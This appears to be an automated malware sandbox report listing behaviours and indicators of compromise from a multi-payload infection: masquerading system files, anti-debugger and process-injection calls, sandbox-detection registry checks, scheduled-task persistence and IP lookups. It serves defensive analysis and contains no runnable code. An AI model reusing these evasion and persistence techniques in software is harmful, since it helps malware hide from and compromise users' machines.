\??\V: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 67 ipinfo.io 108 ipinfo.io 128 ipinfo.io 1 ipinfo.io 26 ipinfo.io 57 ip-api.com -
Drops file in System32 directory 21 IoCs
Processes:
4svaL_6jcYHnI8EWxQv_ARQo.exerundll32.exerundll32.exe4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exesetup.exedescription ioc process File created C:\Windows\SysWOW64\msdxm\winlogon.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File created C:\Windows\SysWOW64\KBDINBE2\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\msdxm\cc11b995f2a76da408ea6a601e682e64743153ad 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\qcap\fontdrvhost.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\CoreUIComponents\dllhost.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\qcap\5b884080fd4f94e2695da25c503f9e33b9605b83 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File created C:\Windows\SysWOW64\dot3gpui\conhost.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\SysWOW64\dot3gpui\conhost.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\dot3gpui\088424020bedd6b28ac7fd22ee35dcd7322895ce 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\KBDINBE2\cmd.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk setup.exe File opened for modification C:\Windows\SysWOW64\msdxm\winlogon.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SysWOW64\CoreUIComponents\5940a34987c99120d96dace90a3f93f329dcad63 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
nGKKAdD43ozQJDv8K6QWTxN0.exe5VZS13s3WByVbE4ADMVZQJD5.exe4svaL_6jcYHnI8EWxQv_ARQo.exe1380456.exe8292732.exe_HVkO6KridfpAFsxSd4xBRC_.exe808C.exe4svaL_6jcYHnI8EWxQv_ARQo.exe4svaL_6jcYHnI8EWxQv_ARQo.exemsedge.exepid process 3196 nGKKAdD43ozQJDv8K6QWTxN0.exe 1672 5VZS13s3WByVbE4ADMVZQJD5.exe 1904 4svaL_6jcYHnI8EWxQv_ARQo.exe 5144 1380456.exe 2668 8292732.exe 4044 _HVkO6KridfpAFsxSd4xBRC_.exe 5104 808C.exe 1236 4svaL_6jcYHnI8EWxQv_ARQo.exe 3696 4svaL_6jcYHnI8EWxQv_ARQo.exe 9532 msedge.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
KtMfKMTyGhGITYlVicMT552T.exeG51K2QNgA1moFPDcsqFsEuBz.exe_v1u23KhcxVvki0UuinAXhKa.exe1435.execmd.exeE7C5.exeregsvr32.exedescription pid process target process PID 1976 set thread context of 3324 1976 KtMfKMTyGhGITYlVicMT552T.exe KtMfKMTyGhGITYlVicMT552T.exe PID 4388 set thread context of 3076 4388 G51K2QNgA1moFPDcsqFsEuBz.exe G51K2QNgA1moFPDcsqFsEuBz.exe PID 4276 set thread context of 5380 4276 _v1u23KhcxVvki0UuinAXhKa.exe _v1u23KhcxVvki0UuinAXhKa.exe PID 3128 set thread context of 1844 3128 1435.exe 1435.exe PID 3168 set thread context of 1040 3168 cmd.exe 5igv91LvXCMygMPp1mBVXES6.exe PID 3964 set thread context of 4640 3964 E7C5.exe AppLaunch.exe PID 6460 set thread context of 10488 6460 regsvr32.exe msedge.exe -
Drops file in Program Files directory 64 IoCs
Processes:
setup.exesetup.exeKzQ4K19_9XrJ2mdTwpnysCw4.exeautosubplayer.exeMicrosoftEdgeUpdateSetup_X86_1.3.153.47.exeMicrosoftEdgeUpdateSetup.exeautosubplayer.exedata_load.exeelevation_service.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\MLModels\autofill_labeling_email.ort setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Mu\Advertising setup.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini KzQ4K19_9XrJ2mdTwpnysCw4.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\msedgeupdate.dll MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\zh-TW.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\et.pak setup.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_lt.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\fr-CA.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\es.pak setup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_it.dll MicrosoftEdgeUpdateSetup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\wns_push_client.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\ar.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\nn.pak setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File opened for modification C:\Program Files\temp_files\MLCgSySS.dll data_load.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe elevation_service.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Mu\Advertising setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\pwahelper.exe setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Sigma\Fingerprinting setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\VisualElements\SmallLogoCanary.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\mr.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Trust Protection Lists\manifest.json setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\sq.pak setup.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr-Latn-RS.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\en-US.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\VisualElements\SmallLogoCanary.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\VisualElements\LogoCanary.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr-Latn-RS.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\bs.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\cy.pak setup.exe File opened for modification C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_mt.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sk.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ne.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\qu.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\msedgewebview2.exe.sig setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\lo.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\tt.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\identity_proxy\identity_helper.Sparse.Beta.msix setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\VisualElements\SmallLogoBeta.png setup.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_el.dll MicrosoftEdgeUpdateSetup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\en-US.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ja.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\learning_tools.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Notifications\SoftLandingAssetLight.gif setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\d3dcompiler_47.dll setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\kok.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ca-Es-VALENCIA.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\wns_push_client.dll setup.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_ar.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_en.dll MicrosoftEdgeUpdateSetup.exe File created C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_id.dll MicrosoftEdgeUpdateSetup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\af.pak setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\identity_proxy\stable.identity_helper.exe.manifest setup.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\msedge_100_percent.pak setup.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\ca.pak setup.exe -
Drops file in Windows directory 39 IoCs
Processes:
msiexec.exerundll32.exesvchost.exerundll32.exe4svaL_6jcYHnI8EWxQv_ARQo.exeMsiExec.exe4svaL_6jcYHnI8EWxQv_ARQo.exeoRqxkgsixdTQLGlCw_wScXlE.exesvchost.exesvchost.exedescription ioc process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Tasks\MLCgSySS.job rundll32.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\f7710a1.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3C95.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7727.tmp msiexec.exe File created C:\Windows\Tasks\MLCgSySS.job rundll32.exe File created C:\Windows\SystemTemp\~DFF97C4367880C56D3.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI66A7.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4E84F4DD8BE3E15A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI415A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI44E5.tmp msiexec.exe File created C:\Windows\Downloaded Program Files\cc11b995f2a76da408ea6a601e682e64743153ad 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\Installer\MSI3EC8.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\StartMenuExperienceHost.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File created C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\55b276f4edf653fe07efe8f1ecc32d3d195abd16 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\Installer\MSI47B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6F93.tmp msiexec.exe File created C:\Windows\System\xxx1.bak oRqxkgsixdTQLGlCw_wScXlE.exe File opened for modification C:\Windows\Installer\MSI26C9.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI3A04.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI768A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9D3F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA222.tmp msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\Downloaded Program Files\winlogon.exe 4svaL_6jcYHnI8EWxQv_ARQo.exe File opened for modification C:\Windows\Installer\MSI8DCD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6CC3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI72B1.tmp msiexec.exe File created C:\Windows\Installer\f7710a1.msi msiexec.exe File created C:\Windows\SystemTemp\~DF29210032494D28CF.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFE0AFE7E23CF134F9.TMP msiexec.exe File created C:\Windows\System\svchost.exe oRqxkgsixdTQLGlCw_wScXlE.exe File opened for modification C:\Windows\System\svchost.exe oRqxkgsixdTQLGlCw_wScXlE.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1584 2744 WerFault.exe iWl5YE6jVqxWhmGtApNhDm2L.exe 1248 1888 WerFault.exe ZPIklAxPB6jR82sYubVd1wws.exe 2864 2840 WerFault.exe Vo5pWC9v4LM4GIuQjsgwgSyb.exe 3108 2912 WerFault.exe 0MCyp39H8AxiYTlGcyBfNoUC.exe 5756 3324 WerFault.exe KtMfKMTyGhGITYlVicMT552T.exe 4384 1320 WerFault.exe far1gFrhm6HTCSwt7AdHUaXK.exe 5692 1656 WerFault.exe YkJJP9hUDzrPj8CaQUtFkm4K.exe 2216 3004 WerFault.exe 6VJcPvgbLTEnL3gyVOmcMDK4.exe 496 4964 WerFault.exe rundll32.exe 2068 5720 WerFault.exe 981C.exe 5180 3964 WerFault.exe E7C5.exe 2324 13216 WerFault.exe GcleanerEU.exe 4572 2464 WerFault.exe GcleanerEU.exe 3716 4288 WerFault.exe gcleaner.exe 6236 4120 WerFault.exe gcleaner.exe 6348 6264 WerFault.exe rundll32.exe 7956 7584 WerFault.exe rundll32.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe nsis_installer_2 C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe nsis_installer_1 C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1435.exeG51K2QNgA1moFPDcsqFsEuBz.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1435.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI G51K2QNgA1moFPDcsqFsEuBz.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI G51K2QNgA1moFPDcsqFsEuBz.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI G51K2QNgA1moFPDcsqFsEuBz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1435.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1435.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeautosubplayer.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeWerFault.exeWerFault.exebuild.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 autosubplayer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier autosubplayer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier autosubplayer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString autosubplayer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz autosubplayer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5632 schtasks.exe 5464 schtasks.exe 1428 schtasks.exe 8240 schtasks.exe 8500 schtasks.exe 2796 schtasks.exe 4804 schtasks.exe 4548 schtasks.exe 5588 schtasks.exe 1452 schtasks.exe 8436 schtasks.exe 8676 schtasks.exe 4980 schtasks.exe 5400 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5188 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 37 IoCs
Processes:
WerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeautosubplayer.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key 